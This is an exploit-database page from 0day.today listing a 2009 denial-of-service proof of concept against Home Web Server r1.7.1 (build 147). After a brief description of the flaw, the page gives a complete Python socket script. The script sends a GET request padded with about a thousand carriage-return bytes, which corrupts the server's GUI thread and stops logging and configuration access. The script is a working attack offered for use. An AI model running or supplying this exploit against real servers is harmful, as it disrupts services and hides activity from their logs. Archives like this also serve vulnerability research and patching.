[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption

Author
Aodrulez
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6842
Category
dos / poc
Date add
22-04-2009
Platform
unsorted
==================================================================
Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption
==================================================================


  Home Web Server <=r1.7.1 (build 147) "Gui Thread-Memory Corruption Exploit." By: Aodrulez.

Product Released : 22.4.2009/21:16:58
 

Description:
	This web server when fed with 
1006 bytes of chr(0x0d),with the html
"GET" parameter,the Server's Gui's 
Thread gets corrupted.This means,
though the web server works normally,
(due to Multithreading),No more Logs 
are generated.Also "all" the web server 
configuration settings are unavailable.


	
Exploit (Python):
----------------------------------------------------------
# Echo client program
import socket

HOST = 'localhost'    # The remote host
pORT = 80           # The same port as used by the server
print '####################################'
print '#Home Web Server r1.7.1 (build 147)#'
print '#  Gui Thread Corruption Exploit   #'
print '#                                  #'
print '#          By: Aodrulez            #'
print '#                                  #'
print '####################################'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, pORT))
p='GET '+chr(0x0d)*1001+'index.html HTTp/1.0\r\n\r\n'
s.send(p)
s.close()
print '\"'+HOST+'\'s Gui Got Corrupted :P\"     '
---------------------------------------------------------





#  0day.today [2024-12-26]  #